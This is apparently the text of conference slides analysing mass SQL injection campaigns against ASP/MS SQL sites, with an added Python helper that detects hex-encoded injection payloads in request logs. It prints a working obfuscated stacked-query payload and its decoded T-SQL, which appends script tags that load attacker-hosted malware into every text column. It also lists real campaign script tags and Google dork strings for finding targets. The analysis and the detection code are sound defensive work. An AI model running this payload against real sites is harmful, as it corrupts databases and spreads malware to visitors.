Analysis of mass SQL injection attacks
Miroslav Štampar ([email protected])
May 13, 2015
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 2
FUD (Fear, Uncertainty, Doubt)
“A new virus is making the rounds and is wreaking havoc on the Internet”
“Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data”
“Targets that bottleneck in the technology, making it platform-independent… Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else”
“...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs”
Google is (not) your friend (1)
Google is (not) your friend (2)
Google is (not) your friend (3)
What's it all about?
Platform dependent (IIS/ASP(.NET))
DBMS dependent (Microsoft SQL Server)
Highly automated (tool-based) approach
Popular SQL enumeration tools, with or without Google search capability, don't count (e.g. sqlmap, Havij, Pangolin)
Infection(s) counting in thousands of domains (not millions as previously believed)
As dumb as it gets (usually one request per target)
In short: malware distribution
Modus operandi
Get hold of a couple of 1-day exploits
Blindly inject a SQL payload carrying malicious content (<script>, <iframe>, etc.) into the content tables of as many vulnerable web servers as possible
Leverage the exploit(s) and/or the user's lack of technical knowledge to install malware (spyware, trojans, etc.) on the visitor's computer
Profit(???) - (DEFCON 18 – Garry Pejski: “My Life As A Spyware Developer”)
Sample leveraged exploits
CVE-2012-4681 Oracle Java 7 Update 6
CVE-2012-1889 Microsoft XML Core Services
CVE-2012-1723 Java Runtime Environment
CVE-2012-0507 Java Runtime Environment
CVE-2011-3544 Java Runtime Environment
CVE-2011-2110 Adobe Flash Player
CVE-2011-0611 Adobe Flash Player
CVE-2010-3552 New Java Plug-in
CVE-2010-0188 Adobe Reader
etc.
Notable members (1)
Lilupophilupop (sl.php) "></title><script src="http://lilupophilupop.com/sl.php"></script><!--
Nikjju (r.php) <script src=http://nikjju.com/r.php></script>
Robint (u.js) <script src=http://ww.robint.us/u.js></script>
LizaMoon (ur.php) </title><script src=http://lizamoon.com/ur.php></script>
Jjghui (urchin.js) </title><script src=http://jjghui.com/urchin.js></script>
Notable members (2)
Notable members (3)
Generic payload (obfuscated)
GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220............................................................5845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--
Generic payload (decoded)
DECLARE @t VARCHAR(255), @c VARCHAR(255)
DECLARE table_cursor CURSOR FOR
SELECT a.name, b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) /* NTEXT, TEXT, NVARCHAR, VARCHAR */
OPEN table_cursor FETCH NEXT FROM table_cursor INTO @t,@c
WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR,['+@c+']))+''<script src=http://www.attacker.com/malicious.js></script>''')
FETCH NEXT FROM table_cursor INTO @t,@c
END
CLOSE table_cursor
DEALLOCATE table_cursor
Analysis (1)
Piggy-backing (stacked) SQL injection
Obfuscated SQL code (hex encoded)
Decoded code dynamically executed with the T-SQL EXEC command
Usage of a cursor for the update
Iterating over all tables / all text-like columns
Appending malicious content (e.g. <script src=...) to all matched column entries using an UPDATE statement
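The obfuscated and decoded payload slides above describe a very recognisable shape (stacked query, CAST of a hex literal, EXEC of the result, cursor over sysobjects/syscolumns, UPDATE appending a script tag). The following detection helper, added here as an illustration and not part of the original talk, decodes that hex literal out of a logged request line and reports which of those traits the decoded T-SQL shows; the sample log lines, the T-SQL they carry and the domain malicious.example are constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Hex literal inside the CAST(0x... AS VARCHAR(n)) wrapper seen on the slides.
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(?:N?VARCHAR|CHAR)", re.I)
# Traits of the decoded script; two or more together are treated as a hit.
INDICATORS = {
    "stacked_exec": re.compile(r"\bEXEC\s*\(", re.I),
    "schema_walk": re.compile(r"\bsysobjects\b.*\bsyscolumns\b", re.I | re.S),
    "cursor_update": re.compile(r"\bCURSOR\b.*\bUPDATE\b", re.I | re.S),
    "script_tag": re.compile(r"<script[^>]*src=", re.I),
}
SCRIPT_SRC = re.compile(r"<script[^>]*src=[\"']?([^\s\"'>]+)", re.I)


def decode_hex_payload(request_line: str) -> Optional[str]:
    """Return the T-SQL hidden in a CAST(0x... AS VARCHAR) literal, or None."""
    m = HEX_CAST.search(unquote(request_line))  # logs keep the URL-encoded form
    if not m:
        return None
    return bytes.fromhex(m.group(1)).decode("latin-1")


def classify(request_line: str) -> dict:
    """Decode one logged request and list what the decoded payload does."""
    decoded = decode_hex_payload(request_line)
    if decoded is None:
        return {"suspicious": False, "indicators": [], "script_src": None}
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    src = SCRIPT_SRC.search(decoded)  # the URL victims' pages would load
    return {"suspicious": len(hits) >= 2, "indicators": hits,
            "script_src": src.group(1) if src else None}


# Constructed sample: one benign request and one carrying a hex-encoded
# payload of the same shape as the generic payload on the slides.
_INJECTED_TSQL = (
    "DECLARE @t VARCHAR(255),@c VARCHAR(255) DECLARE table_cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "OPEN table_cursor EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR,['+@c+']))"
    "+''<script src=http://malicious.example/x.js></script>''') CLOSE table_cursor"
)
SAMPLE_LOG = [
    "GET /vuln.asp?param=1 200",
    "GET /vuln.asp?param=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + _INJECTED_TSQL.encode().hex() + "%20AS%20VARCHAR(4000));EXEC(@S);-- 200",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
```

Because the script is decoded rather than pattern-matched in hex form, the same check keeps working when the attacker swaps the injected domain or re-encodes the payload.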
Analysis (2)
Analysis (3)
Example (1) - FAIL
Example (2) - FAIL
Example (3) - FAIL
Example (4) – CLUSTER FAIL
Example (5) - SUCCESS
Example (6) - SUCCESS
Asprox (1)
Spam botnet used for phishing scams (>10K bots)
Developed over years
Interesting update “msscntr32.exe” (SQL attack tool)
Google search for targets (e.g. inurl:".asp")
Launch SQL injection attacks against resulting pages
Asprox (2)
CLI (1)
Standalone executable
Rare beast (Chinese underground forums?)
Google search for targets (e.g.: inurl:".asp" inurl:"a=")
Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></script>)
Wild guess is that attackers are being paid for using the tool (backcall to *.cn/pay.asp?SN=...)
CLI (2)
Sample tool (1)
Sample tool (2)
Sample tool (3)
Sample tool (4)
Sample tool (5)
Sample run (1)
Sample run (2)
Sample run (3)
Sample run (4)
Sample run (5)
Sample run (6)
Sample run (7)
Sample run (8)
Questions?